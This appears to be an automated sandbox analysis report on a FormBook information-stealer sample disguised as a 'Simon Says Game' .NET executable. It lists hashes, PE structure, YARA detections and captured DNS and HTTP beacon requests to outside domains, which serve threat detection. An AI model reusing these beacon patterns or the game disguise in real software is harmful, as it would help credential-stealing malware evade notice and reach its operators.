                                                  • Windows Screen Saver (13104/52) 0.07%
                                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                                  File name:H4vBtZsi8xAKaMm.exe
                                                  File size:1304576
                                                  MD5:7eabab04e4a6fdd45238e32ed81e222c
                                                  SHA1:e0e1dc469746f5e2e049ea4a93d9b09a9227b342
                                                  SHA256:b79d2d02fe777cfd64723ad9b3935b30c00cbc75614fcadbf867cce88df4a8fd
                                                  SHA512:eeaa0f02a15a66b3363f94730ad3cf7c533a4bf303cfa0f53b21959a54dc0f65c50b1ac179aa5f992e3e17bbfaaa1b7393da3d1859ddd51932d36bdf0b7fa21b
                                                  SSDEEP:24576:Xn0jA6ehzLFCgTrc1zKViGWIANSCqCmURrOrSO/8dVnJE0RujU88WyPZxG:X96e1d4171NNSCquRiFjD/8WyRk
                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...e..a..............P..D...........b... ........@.. .......................@............@................................

                                                  File Icon

                                                  Icon Hash:b2b2929292b2b2b2

                                                  Static PE Info

                                                  General

                                                  Entrypoint:0x5362ea
                                                  Entrypoint Section:.text
                                                  Digitally signed:false
                                                  Imagebase:0x400000
                                                  Subsystem:windows gui
                                                  Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                  DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                  Time Stamp:0x61F09D65 [Wed Jan 26 01:01:25 2022 UTC]
                                                  TLS Callbacks:
                                                  CLR (.Net) Version:v4.0.30319
                                                  OS Version Major:4
                                                  OS Version Minor:0
                                                  File Version Major:4
                                                  File Version Minor:0
                                                  Subsystem Version Major:4
                                                  Subsystem Version Minor:0
                                                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                  Entrypoint Preview

                                                  Instruction
                                                  jmp dword ptr [00402000h]
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al

                                                  Data Directories

                                                  NameVirtual AddressVirtual Size Is in Section
                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x1362980x4f.text
                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x1380000x9f74.rsrc
                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x1420000xc.reloc
                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x1361600x1c.text
                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                  Sections

                                                  NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                  .text0x20000x1342f00x134400False0.912575875659data7.91694602687IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                  .rsrc0x1380000x9f740xa000False0.159008789062data6.8397629142IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                  .reloc0x1420000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                  Resources

                                                  NameRVASizeTypeLanguageCountry
                                                  RT_ICON0x1381200x4c28dBase IV DBT, blocks size 0, block length 18432, next free block index 40, next free block 0, next used block 16777216
                                                  RT_ICON0x13cd580x4c28dBase IV DBT, blocks size 0, block length 18432, next free block index 40, next free block 0, next used block 16777216
                                                  RT_GROUP_ICON0x1419900x22data
                                                  RT_VERSION0x1419c40x3b0data
                                                  RT_MANIFEST0x141d840x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                                  Imports

                                                  DLLImport
                                                  mscoree.dll_CorExeMain

                                                  Version Infos

                                                  DescriptionData
                                                  Translation0x0000 0x04b0
                                                  LegalCopyrightCopyright Francisco Laria 2007
                                                  Assembly Version1.0.0.0
                                                  InternalName760pQ.exe
                                                  FileVersion1.0.0.0
                                                  CompanyNameFrancisco Laria
                                                  LegalTrademarks
                                                  CommentsA .NET version of the classic board game.
                                                  ProductNameSimon Says Game
                                                  ProductVersion1.0.0.0
                                                  FileDescriptionSimon Says Game
                                                  OriginalFilename760pQ.exe

                                                  Network Behavior

                                                  Snort IDS Alerts

                                                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                  01/28/22-15:17:54.685247ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.78.8.8.8
                                                  01/28/22-15:17:55.551640ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.78.8.8.8
                                                  01/28/22-15:17:57.802015ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.78.8.8.8

                                                  Network Port Distribution

                                                  TCP Packets

                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Jan 28, 2022 15:16:23.253470898 CET4968680192.168.2.7173.222.108.210
                                                  Jan 28, 2022 15:16:23.270128965 CET8049686173.222.108.210192.168.2.7
                                                  Jan 28, 2022 15:16:23.270261049 CET4968680192.168.2.7173.222.108.210
                                                  Jan 28, 2022 15:16:24.966999054 CET804968493.184.220.29192.168.2.7
                                                  Jan 28, 2022 15:16:24.967207909 CET4968480192.168.2.793.184.220.29
                                                  Jan 28, 2022 15:16:27.496630907 CET804969293.184.220.29192.168.2.7
                                                  Jan 28, 2022 15:16:27.496728897 CET4969280192.168.2.793.184.220.29
                                                  Jan 28, 2022 15:17:12.899142027 CET4968480192.168.2.793.184.220.29
                                                  Jan 28, 2022 15:17:12.899296045 CET4968280192.168.2.7173.222.108.210
                                                  Jan 28, 2022 15:17:12.916321039 CET8049682173.222.108.210192.168.2.7
                                                  Jan 28, 2022 15:17:12.916470051 CET4968280192.168.2.7173.222.108.210
                                                  Jan 28, 2022 15:17:12.919374943 CET804968493.184.220.29192.168.2.7
                                                  Jan 28, 2022 15:17:12.920589924 CET4968480192.168.2.793.184.220.29
                                                  Jan 28, 2022 15:17:22.192085981 CET4969280192.168.2.793.184.220.29
                                                  Jan 28, 2022 15:18:48.838774920 CET4988080192.168.2.7107.180.34.104
                                                  Jan 28, 2022 15:18:48.949897051 CET8049880107.180.34.104192.168.2.7
                                                  Jan 28, 2022 15:18:48.949994087 CET4988080192.168.2.7107.180.34.104
                                                  Jan 28, 2022 15:18:48.952475071 CET4988080192.168.2.7107.180.34.104
                                                  Jan 28, 2022 15:18:49.070127010 CET8049880107.180.34.104192.168.2.7
                                                  Jan 28, 2022 15:18:49.070324898 CET4988080192.168.2.7107.180.34.104
                                                  Jan 28, 2022 15:18:49.070355892 CET4988080192.168.2.7107.180.34.104
                                                  Jan 28, 2022 15:18:49.182204008 CET8049880107.180.34.104192.168.2.7
                                                  Jan 28, 2022 15:19:12.004883051 CET4988580192.168.2.7192.0.78.24
                                                  Jan 28, 2022 15:19:12.021564960 CET8049885192.0.78.24192.168.2.7
                                                  Jan 28, 2022 15:19:12.024972916 CET4988580192.168.2.7192.0.78.24
                                                  Jan 28, 2022 15:19:12.066575050 CET4988580192.168.2.7192.0.78.24
                                                  Jan 28, 2022 15:19:12.083214998 CET8049885192.0.78.24192.168.2.7
                                                  Jan 28, 2022 15:19:12.220340014 CET8049885192.0.78.24192.168.2.7
                                                  Jan 28, 2022 15:19:12.220377922 CET8049885192.0.78.24192.168.2.7
                                                  Jan 28, 2022 15:19:12.220552921 CET4988580192.168.2.7192.0.78.24
                                                  Jan 28, 2022 15:19:12.220606089 CET4988580192.168.2.7192.0.78.24
                                                  Jan 28, 2022 15:19:12.239855051 CET8049885192.0.78.24192.168.2.7
                                                  Jan 28, 2022 15:19:35.543049097 CET4988780192.168.2.792.222.235.170
                                                  Jan 28, 2022 15:19:35.572104931 CET804988792.222.235.170192.168.2.7
                                                  Jan 28, 2022 15:19:35.572236061 CET4988780192.168.2.792.222.235.170
                                                  Jan 28, 2022 15:19:35.623141050 CET4988780192.168.2.792.222.235.170
                                                  Jan 28, 2022 15:19:35.652195930 CET804988792.222.235.170192.168.2.7
                                                  Jan 28, 2022 15:19:35.810760975 CET804988792.222.235.170192.168.2.7
                                                  Jan 28, 2022 15:19:35.810784101 CET804988792.222.235.170192.168.2.7
                                                  Jan 28, 2022 15:19:35.811115026 CET4988780192.168.2.792.222.235.170
                                                  Jan 28, 2022 15:19:35.813723087 CET4988780192.168.2.792.222.235.170
                                                  Jan 28, 2022 15:19:35.842775106 CET804988792.222.235.170192.168.2.7

                                                  UDP Packets

                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Jan 28, 2022 15:17:48.665153027 CET6429653192.168.2.78.8.8.8
                                                  Jan 28, 2022 15:17:49.667907953 CET6429653192.168.2.78.8.8.8
                                                  Jan 28, 2022 15:17:50.688549042 CET6429653192.168.2.78.8.8.8
                                                  Jan 28, 2022 15:17:52.785115004 CET6429653192.168.2.78.8.8.8
                                                  Jan 28, 2022 15:17:53.681818962 CET53642968.8.8.8192.168.2.7
                                                  Jan 28, 2022 15:17:54.685043097 CET53642968.8.8.8192.168.2.7
                                                  Jan 28, 2022 15:17:55.550877094 CET53642968.8.8.8192.168.2.7
                                                  Jan 28, 2022 15:17:57.801929951 CET53642968.8.8.8192.168.2.7
                                                  Jan 28, 2022 15:18:17.763120890 CET6098353192.168.2.78.8.8.8
                                                  Jan 28, 2022 15:18:17.798033953 CET53609838.8.8.8192.168.2.7
                                                  Jan 28, 2022 15:18:48.755186081 CET5228653192.168.2.78.8.8.8
                                                  Jan 28, 2022 15:18:48.784271955 CET53522868.8.8.8192.168.2.7
                                                  Jan 28, 2022 15:19:11.739278078 CET6145753192.168.2.78.8.8.8
                                                  Jan 28, 2022 15:19:11.762356997 CET53614578.8.8.8192.168.2.7
                                                  Jan 28, 2022 15:19:34.159179926 CET6059953192.168.2.78.8.8.8
                                                  Jan 28, 2022 15:19:34.193367958 CET53605998.8.8.8192.168.2.7

                                                  ICMP Packets

                                                  TimestampSource IPDest IPChecksumCodeType
                                                  Jan 28, 2022 15:17:54.685246944 CET192.168.2.78.8.8.8cff9(Port unreachable)Destination Unreachable
                                                  Jan 28, 2022 15:17:55.551640034 CET192.168.2.78.8.8.8cff9(Port unreachable)Destination Unreachable
                                                  Jan 28, 2022 15:17:57.802015066 CET192.168.2.78.8.8.8cff9(Port unreachable)Destination Unreachable

                                                  DNS Queries

                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                  Jan 28, 2022 15:17:48.665153027 CET192.168.2.78.8.8.80xa4f9Standard query (0)www.vzn2aai2qj.icuA (IP address)IN (0x0001)
                                                  Jan 28, 2022 15:17:49.667907953 CET192.168.2.78.8.8.80xa4f9Standard query (0)www.vzn2aai2qj.icuA (IP address)IN (0x0001)
                                                  Jan 28, 2022 15:17:50.688549042 CET192.168.2.78.8.8.80xa4f9Standard query (0)www.vzn2aai2qj.icuA (IP address)IN (0x0001)
                                                  Jan 28, 2022 15:17:52.785115004 CET192.168.2.78.8.8.80xa4f9Standard query (0)www.vzn2aai2qj.icuA (IP address)IN (0x0001)
                                                  Jan 28, 2022 15:18:17.763120890 CET192.168.2.78.8.8.80xd8e4Standard query (0)www.deutscheno1.comA (IP address)IN (0x0001)
                                                  Jan 28, 2022 15:18:48.755186081 CET192.168.2.78.8.8.80x66b7Standard query (0)www.shitcoin.teamA (IP address)IN (0x0001)
                                                  Jan 28, 2022 15:19:11.739278078 CET192.168.2.78.8.8.80xfa76Standard query (0)www.marymarinho.comA (IP address)IN (0x0001)
                                                  Jan 28, 2022 15:19:34.159179926 CET192.168.2.78.8.8.80xfdb5Standard query (0)www.bettingweb365.comA (IP address)IN (0x0001)

                                                  DNS Answers

                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                  Jan 28, 2022 15:17:53.681818962 CET8.8.8.8192.168.2.70xa4f9Server failure (2)www.vzn2aai2qj.icunonenoneA (IP address)IN (0x0001)
                                                  Jan 28, 2022 15:17:54.685043097 CET8.8.8.8192.168.2.70xa4f9Server failure (2)www.vzn2aai2qj.icunonenoneA (IP address)IN (0x0001)
                                                  Jan 28, 2022 15:17:55.550877094 CET8.8.8.8192.168.2.70xa4f9Server failure (2)www.vzn2aai2qj.icunonenoneA (IP address)IN (0x0001)
                                                  Jan 28, 2022 15:17:57.801929951 CET8.8.8.8192.168.2.70xa4f9Server failure (2)www.vzn2aai2qj.icunonenoneA (IP address)IN (0x0001)
                                                  Jan 28, 2022 15:18:17.798033953 CET8.8.8.8192.168.2.70xd8e4No error (0)www.deutscheno1.com34.149.59.90A (IP address)IN (0x0001)
                                                  Jan 28, 2022 15:18:48.784271955 CET8.8.8.8192.168.2.70x66b7No error (0)www.shitcoin.teamshitcoin.teamCNAME (Canonical name)IN (0x0001)
                                                  Jan 28, 2022 15:18:48.784271955 CET8.8.8.8192.168.2.70x66b7No error (0)shitcoin.team107.180.34.104A (IP address)IN (0x0001)
                                                  Jan 28, 2022 15:19:11.762356997 CET8.8.8.8192.168.2.70xfa76No error (0)www.marymarinho.commarymarinho.comCNAME (Canonical name)IN (0x0001)
                                                  Jan 28, 2022 15:19:11.762356997 CET8.8.8.8192.168.2.70xfa76No error (0)marymarinho.com192.0.78.24A (IP address)IN (0x0001)
                                                  Jan 28, 2022 15:19:11.762356997 CET8.8.8.8192.168.2.70xfa76No error (0)marymarinho.com192.0.78.25A (IP address)IN (0x0001)
                                                  Jan 28, 2022 15:19:34.193367958 CET8.8.8.8192.168.2.70xfdb5No error (0)www.bettingweb365.combettingweb365.comCNAME (Canonical name)IN (0x0001)
                                                  Jan 28, 2022 15:19:34.193367958 CET8.8.8.8192.168.2.70xfdb5No error (0)bettingweb365.com92.222.235.170A (IP address)IN (0x0001)

                                                  HTTP Request Dependency Graph

                                                  • www.shitcoin.team
                                                  • www.marymarinho.com
                                                  • www.bettingweb365.com

                                                  HTTP Packets

                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                  0192.168.2.749880107.180.34.10480C:\Windows\explorer.exe
                                                  TimestampkBytes transferredDirectionData
                                                  Jan 28, 2022 15:18:48.952475071 CET23848OUTGET /u1p5/?y4Mp=vL5j7Eq3si3+pqkwq9GVQc9zWaxA/P/bTusMaerk9f3EW+lc0CCc1NhXRSl0Kt4KYFMx8zSAYw==&D0GHx=5jNT HTTP/1.1
                                                  Host: www.shitcoin.team
                                                  Connection: close
                                                  Data Raw: 00 00 00 00 00 00 00
                                                  Data Ascii:
                                                  Jan 28, 2022 15:18:49.070127010 CET23850INHTTP/1.1 404 Not Found
                                                  Content-Type: text/html
                                                  Server: Microsoft-IIS/8.5
                                                  X-Powered-By: ASP.NET
                                                  X-Powered-By-Plesk: PleskWin
                                                  Date: Fri, 28 Jan 2022 14:18:48 GMT
                                                  Connection: close
                                                  Content-Length: 1118
                                                  Data Raw: 3c 48 54 4d 4c 3e 0d 0a 3c 48 45 41 44 3e 0d 0a 3c 54 49 54 4c 45 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 42 41 53 45 20 68 72 65 66 3d 22 2f 65 72 72 6f 72 5f 64 6f 63 73 2f 22 3e 3c 21 2d 2d 5b 69 66 20 6c 74 65 20 49 45 20 36 5d 3e 3c 2f 42 41 53 45 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0d 0a 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 0d 0a 3c 48 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 31 3e 0d 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 64 6f 63 75 6d 65 6e 74 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 0d 0a 3c 50 3e 0d 0a 3c 48 52 3e 0d 0a 3c 41 44 44 52 45 53 53 3e 0d 0a 57 65 62 20 53 65 72 76 65 72 20 61 74 20 26 23 31 31 35 3b 26 23 31 30 34 3b 26 23 31 30 35 3b 26 23 31 31 36 3b 26 23 39 39 3b 26 23 31 31 31 3b 26 23 31 30 35 3b 26 23 31 31 30 3b 26 23 34 36 3b 26 23 31 31 36 3b 26 23 31 30 31 3b 26 23 39 37 3b 26 23 31 30 39 3b 0d 0a 3c 2f 41 44 44 52 45 53 53 3e 0d 0a 3c 2f 42 4f 44 59 3e 0d 0a 3c 2f 48 54 4d 4c 3e 0d 0a 0d 0a 3c 21 2d 2d 0d 0a 20 20 20 2d 20 55 6e 66 6f 72 74 75 6e 61 74 65 6c 79 2c 20 4d 69 63 72 6f 73 6f 66 74 20 68 61 73 20 61 64 64 65 64 20 61 20 63 6c 65 76 65 72 20 6e 65 77 0d 0a 20 20 20 2d 20 22 66 65 61 74 75 72 65 22 20 74 6f 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 2e 20 49 66 20 74 68 65 20 74 65 78 74 20 6f 66 0d 0a 20 20 20 2d 20 61 6e 20 65 72 72 6f 72 27 73 20 6d 65 73 73 61 67 65 20 69 73 20 22 74 6f 6f 20 73 6d 61 6c 6c 22 2c 20 73 70 65 63 69 66 69 63 61 6c 6c 79 0d 0a 20 20 20 2d 20 6c 65 73 73 20 74 68 61 6e 20 35 31 32 20 62 79 74 65 73 2c 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 20 72 65 74 75 72 6e 73 0d 0a 20 20 20 2d 20 69 74 73 20 6f 77 6e 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 2e 20 59 6f 75 20 63 61 6e 20 74 75 72 6e 20 74 68 61 74 20 6f 66 66 2c 0d 0a 20 20 20 2d 20 62 75 74 20 69 74 27 73 20 70 72 65 74 74 79 20 74 72 69 63 6b 79 20 74 6f 20 66 69 6e 64 20 73 77 69 74 63 68 20 63 61 6c 6c 65 64 0d 0a 20 20 20 2d 20 22 73 6d 61 72 74 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 73 22 2e 20 54 68 61 74 20 6d 65 61 6e 73 2c 20 6f 66 20 63 6f 75 72 73 65 2c 0d 0a 20 20 20 2d 20 74 68 61 74 20 73 68 6f 72 74 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 73 20 61 72 65 20 63 65 6e 73 6f 72 65 64 20 62 79 20 64 65 66 61 75 6c 74 2e 0d 0a 20 20 20 2d 20 49 49 53 20 61 6c 77 61 79 73 20 72 65 74 75 72 6e 73 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 73 20 74 68 61 74 20 61 72 65 20 6c 6f 6e 67 0d 0a 20 20 20 2d 20 65 6e 6f 75 67 68 20 74 6f 20 6d 61 6b 65 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 20 68 61 70 70 79 2e 20 54 68 65 0d 0a 20 20 20 2d 20 77 6f 72 6b 61 72 6f 75 6e 64 20 69 73 20 70 72 65 74 74 79 20 73 69 6d 70 6c 65 3a 20 70 61 64 20 74 68 65 20 65 72 72 6f 72 0d 0a 20 20 20 2d 20 6d 65 73 73 61 67 65 20 77 69 74 68 20 61 20 62 69 67 20 63 6f 6d 6d 65 6e 74 20 6c 69 6b 65 20 74 68 69 73 20 74 6f 20 70 75 73 68 20 69 74 0d 0a 20 20 20 2d 20 6f 76 65 72 20 74 68 65 20 66 69 76 65 20 68 75 6e 64 72 65 64 20 61 6e 64 20 74 77 65 6c 76 65 20 62 79 74 65 73 20 6d 69 6e 69 6d 75 6d 2e 0d 0a 20 20 20 2d 20 4f 66 20 63 6f 75 72 73 65 2c 20 74 68 61 74 27 73 20 65 78 61 63 74 6c 79 20 77 68 61 74 20 79 6f 75 27 72 65 20 72 65 61 64 69 6e 67 0d 0a 20 20 20 2d 20 72 69 67 68 74 20 6e 6f 77 2e 0d 0a 20 20 20 2d 2d 3e 0d 0a
                                                  Data Ascii: <HTML><HEAD><TITLE>404 Not Found</TITLE><BASE href="/error_docs/">...[if lte IE 6]></BASE><![endif]--></HEAD><BODY><H1>Not Found</H1>The requested document was not found on this server.<P><HR><ADDRESS>Web Server at &#115;&#104;&#105;&#116;&#99;&#111;&#105;&#110;&#46;&#116;&#101;&#97;&#109;</ADDRESS></BODY></HTML>... - Unfortunately, Microsoft has added a clever new - "feature" to Internet Explorer. If the text of - an error's message is "too small", specifically - less than 512 bytes, Internet Explorer returns - its own error message. You can turn that off, - but it's pretty tricky to find switch called - "smart error messages". That means, of course, - that short error messages are censored by default. - IIS always returns error messages that are long - enough to make Internet Explorer happy. The - workaround is pretty simple: pad the error - message with a big comment like this to push it - over the five hundred and twelve bytes minimum. - Of course, that's exactly what you're reading - right now. -->


                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                  1192.168.2.749885192.0.78.2480C:\Windows\explorer.exe
                                                  TimestampkBytes transferredDirectionData
                                                  Jan 28, 2022 15:19:12.066575050 CET23882OUTGET /u1p5/?y4Mp=jmW97e0DcxHZsiDt+DmiFhziWrO1jPfkTbEIn6OHXnuLtYKLIrDwNEu/EQYt2xDuBHghXZP9DQ==&D0GHx=5jNT HTTP/1.1
                                                  Host: www.marymarinho.com
                                                  Connection: close
                                                  Data Raw: 00 00 00 00 00 00 00
                                                  Data Ascii:
                                                  Jan 28, 2022 15:19:12.220340014 CET23883INHTTP/1.1 301 Moved Permanently
                                                  Server: nginx
                                                  Date: Fri, 28 Jan 2022 14:19:12 GMT
                                                  Content-Type: text/html
                                                  Content-Length: 162
                                                  Connection: close
                                                  Location: https://www.marymarinho.com/u1p5/?y4Mp=jmW97e0DcxHZsiDt+DmiFhziWrO1jPfkTbEIn6OHXnuLtYKLIrDwNEu/EQYt2xDuBHghXZP9DQ==&D0GHx=5jNT
                                                  X-ac: 2.hhn _dfw
                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                  Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                  2192.168.2.74988792.222.235.17080C:\Windows\explorer.exe
                                                  TimestampkBytes transferredDirectionData
                                                  Jan 28, 2022 15:19:35.623141050 CET23891OUTGET /u1p5/?y4Mp=UXBCCV9Hg7LlUlEhFgBZZuvhtrkgDnenbWAOO9JvD+HvWaQ2ttROIxFaz7G4unDmw6qRWL3K2g==&D0GHx=5jNT HTTP/1.1
                                                  Host: www.bettingweb365.com
                                                  Connection: close
                                                  Data Raw: 00 00 00 00 00 00 00
                                                  Data Ascii:
                                                  Jan 28, 2022 15:19:35.810760975 CET23891INHTTP/1.1 301 Moved Permanently
                                                  Date: Fri, 28 Jan 2022 14:19:35 GMT
                                                  Server: Apache
                                                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                  Cache-Control: no-cache, must-revalidate, max-age=0
                                                  X-Redirect-By: WordPress
                                                  Location: http://bettingweb365.com/u1p5/?y4Mp=UXBCCV9Hg7LlUlEhFgBZZuvhtrkgDnenbWAOO9JvD+HvWaQ2ttROIxFaz7G4unDmw6qRWL3K2g==&D0GHx=5jNT
                                                  Vary: Accept-Encoding
                                                  Content-Length: 0
                                                  Connection: close
                                                  Content-Type: text/html; charset=UTF-8


                                                  Statistics

                                                  Behavior

                                                  Click to jump to process

                                                  System Behavior

                                                  General

                                                  Target ID:1
                                                  Start time:15:15:37
                                                  Start date:28/01/2022
                                                  Path:C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe"
                                                  Imagebase:0xe30000
                                                  File size:1304576 bytes
                                                  MD5 hash:7EABAB04E4A6FDD45238E32ED81E222C
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:.Net C# or VB.NET
                                                  Yara matches:
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.341894458.00000000042D9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.341894458.00000000042D9000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.341894458.00000000042D9000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                  • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000001.00000002.341173431.000000000363B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  Reputation:low

                                                  General

                                                  Target ID:14
                                                  Start time:15:16:13
                                                  Start date:28/01/2022
                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:{path}
                                                  Imagebase:0x4b0000
                                                  File size:261728 bytes
                                                  MD5 hash:D621FD77BD585874F9686D3A76462EF1
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000E.00000002.401541679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
